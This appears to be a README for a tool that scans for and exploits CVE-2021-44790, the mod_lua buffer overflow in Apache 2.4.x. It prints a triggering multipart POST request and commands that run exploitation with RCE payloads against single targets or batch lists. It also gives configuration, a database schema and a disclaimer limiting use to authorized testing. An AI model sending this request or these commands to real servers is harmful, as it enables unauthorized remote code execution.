
Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna.
Apache mod_lua バッファオーバーフローエクスプロイトは、Apache HTTP Server 2.4.x の mod_lua モジュールに存在する重大なバッファオーバーフロー脆弱性 CVE-2021-44790 を対象とした、高度なエンタープライズグレードのエクスプロイトプラットフォームです。このフレームワークは、包括的なフィンガープリンティング、インテリジェントなスクリプト発見、マルチステージスキャン、プロフェッショナルなレポート機能を備え、95%以上の信頼度で検出します。
この脆弱性は、mod_lua モジュールが multipart/form-data リクエストを処理する際に存在します。lua_request_parsebody() 関数の整数アンダーフローにより、ヒープベースのバッファオーバーフローが発生し、リモートコード実行につながる可能性があります。
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4
4
Content-Disposition: form-data; name="name"
0
4
| メインインターフェース | フィンガープリント結果 |
|---|---|
![]() | ![]() |
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
# Install dependencies
pip install -r requirements.txt
# Verify installation
python3 exploit.py --version
# Quick vulnerability scan
python3 exploit.py http://target.com
# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose
# Generate all reports
python3 exploit.py http://target.com --report all
# Research mode with database
python3 exploit.py http://target.com --research
python3 exploit.py [TARGET] [OPTIONS]
python3 exploit.py https://example.com --verbose --report all
python3 exploit.py https://internal-server.com \
--proxy http://proxy.corp.com:8080 \
--threads 10 \
--timeout 15 \
--verbose \
--report all \
--output /var/log/security/
python3 exploit.py https://client.com \
--threads 30 \
--timeout 10 \
--exploit \
--all-payloads \
--report all \
--screenshot \
--research \
--verbose \
--output /pentest/client_name/
python3 exploit.py --batch targets.txt --config config.yaml
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"
# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------
# Scan Settings
threads: 20 # Concurrent threads
timeout: 10 # Request timeout in seconds
retries: 3 # Number of retry attempts
rate_limit: 10 # Requests per second
max_depth: 3 # Directory traversal depth
follow_redirects: true # Follow HTTP redirects
verify_ssl: false # Verify SSL certificates
# Network Settings
proxy: null # Proxy URL
http2: true # Enable HTTP/2 support
user_agent: random # User-Agent (random/specific)
save_packets: false # Save raw network packets
# Analysis Settings
research_mode: true # Enable research database
verbose: false # Verbose output
scan_only: false # Scan without exploitation
exploit: false # Enable exploitation
all_payloads: false # Use all payloads
# Payload Settings
payloads:
detection: true
memory: true
rce: true
dos: false
# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports
# Database Settings
database_path: luastorm.db
database_retention: 365
# Directory Settings
logs_dir: logs
screenshots_dir: screenshots
{
"scan_id": "a1b2c3d4",
"target": {
"url": "https://example.com",
"hostname": "example.com",
"port": 443
},
"vulnerable": true,
"risk_level": "Critical",
"scan_duration": 45.23,
"timestamp": "2026-08-04T15:45:23"
}
-- Targets table
CREATE TABLE targets (
id INTEGER PRIMARY KEY,
scan_id TEXT UNIQUE,
url TEXT,
hostname TEXT,
ip TEXT,
port INTEGER,
protocol TEXT,
apache_version TEXT,
lua_version TEXT,
os TEXT,
architecture TEXT,
waf TEXT,
cdn TEXT,
vulnerable INTEGER,
risk_level TEXT,
scan_date TEXT,
duration REAL
);
-- Scripts table
CREATE TABLE scripts (
id INTEGER PRIMARY KEY,
scan_id TEXT,
path TEXT,
method TEXT,
status_code INTEGER,
content_type TEXT,
response_time REAL,
vulnerable INTEGER
);
-- Payloads table
CREATE TABLE payloads (
id INTEGER PRIMARY KEY,
scan_id TEXT,
script_id INTEGER,
payload_name TEXT,
payload_type TEXT,
success INTEGER,
response_time REAL,
indicators TEXT,
error TEXT
);
# plugins/my_plugin.py
class MyPlugin:
plugin_name = "my_plugin"
plugin_version = "1.0"
plugin_author = "Your Name"
def __init__(self, config):
self.config = config
def execute(self, target_info):
"""Execute plugin logic"""
return {
'status': 'success',
'message': 'Plugin executed',
'data': {'target': target_info.url}
}
THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.
Unauthorized use against systems you do not own or have explicit permission to test
is illegal and unethical. The author assumes no responsibility for misuse, damage,
or legal consequences arising from the use of this tool.
By using this tool, you agree to:
1. Only test systems you own or have written permission to test
2. Comply with all applicable laws and regulations
3. Report findings responsibly
4. Not use this tool for malicious purposes
コントリビューションを歓迎します!以下のガイドラインに従ってください:
# Clone your fork
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
# Install development dependencies
pip install -r requirements-dev.txt
# Run tests
python -m pytest tests/
Sudeepa Wanigarathna
教育および許可されたテスト目的のみ
本ソフトウェアは、明示的または黙示的を問わず、いかなる種類の保証もなく「現状のまま」提供されます。
⭐ このリポジトリにスターを付けてプロジェクトを支援してください!
💡 バグを発見しましたか? Issueを開く
📧 連絡先: [email protected]
セキュリティコミュニティのために❤️を込めて
| 機能 | 説明 |
|---|
| 🔍 高度なフィンガープリンティング | Apacheバージョン、mod_lua、OS、アーキテクチャ、WAF、CDN、コンテナ、クラウドプロバイダーの検出 |
| 🎯 インテリジェントな発見 | robots.txt、sitemap、HTML解析、JavaScript抽出など7種類以上の発見手法 |
| 💥 マルチステージスキャン | 接続 → フィンガープリント → 発見 → 検証 → エクスプロイト → レポート |
| 🧩 拡張可能なプラグインシステム | 将来のCVEに対応するための簡単なプラグイン開発 |
| 🌐 スマートHTTPエンジン | 接続プール、リトライ、HTTP/2サポート、レート制限 |
| 📊 包括的なレポート | インタラクティブなダッシュボード付きのJSON、HTML、Markdown、PDF |
| 🎨 美しいターミナルUI | プログレスバー、テーブル、色分け出力を備えたRichライブラリ |
| 💾 リサーチデータベース | 完全なスキャン履歴とクエリサポートを備えたSQLiteストレージ |
| 📸 スクリーンショット取得 | 証拠収集のためのWebページの自動スクリーンショット |
| 🚀 高性能 | 20以上の同時スレッド、100以上の接続プール |
| 属性 | 値 |
|---|
| CVE ID | CVE-2021-44790 |
| 脆弱性 | バッファオーバーフロー(整数アンダーフロー) |
| 影響を受けるソフトウェア | Apache HTTP Server 2.4.0 ~ 2.4.51 |
| 修正バージョン | Apache HTTP Server 2.4.52以降 |
| コンポーネント | mod_lua モジュール |
| 攻撃ベクトル | ネットワーク(リモート) |
| CVSSスコア | 9.8(緊急) |
| 機密性への影響 | 高 |
| 完全性への影響 | 高 |
| 可用性への影響 | 高 |
| エクスプロイトの成熟度 | 概念実証(PoC)利用可能 |
| スキャン進行状況 | HTMLレポートダッシュボード |
|---|
![]() | ![]() |
| オプション | 説明 | 例 |
|---|
TARGET | ターゲットURL | http://target.com |
--config FILE | 設定ファイル | --config config.yaml |
--threads N | スレッド数 | --threads 30 |
--timeout N | リクエストタイムアウト(秒) | --timeout 15 |
--proxy URL | プロキシURL | --proxy http://127.0.0.1:8080 |
--verbose | 詳細出力 | --verbose |
--scan-only | エクスプロイトなしでスキャンのみ実行 | --scan-only |
--exploit | エクスプロイトを有効化 | --exploit |
--all-payloads | すべてのペイロードを使用 | --all-payloads |
--report FORMAT | レポート形式(json/html/markdown/all) | --report all |
--output DIR | 出力ディレクトリ | --output /path/to/reports/ |
--research | リサーチモードを有効化 | --research |
--database FILE | データベースパス | --database luastorm.db |
--screenshot | スクリーンショットを撮影 | --screenshot |
--batch FILE | ターゲットを含むバッチファイル | --batch targets.txt |
--query SQL | データベースクエリを実行 | --query "SELECT * FROM targets" |
| 機能 | パフォーマンス |
|---|
| フィンガープリンティング | 2秒未満 |
| スクリプト発見 | 5〜10秒 |
| ペイロードテスト | ペイロードあたり1〜5秒 |
| レポート生成 | 1秒未満 |
| データベース操作 | 100ms未満 |
| 同時スレッド | 20以上 |
| 接続プール | 100以上 |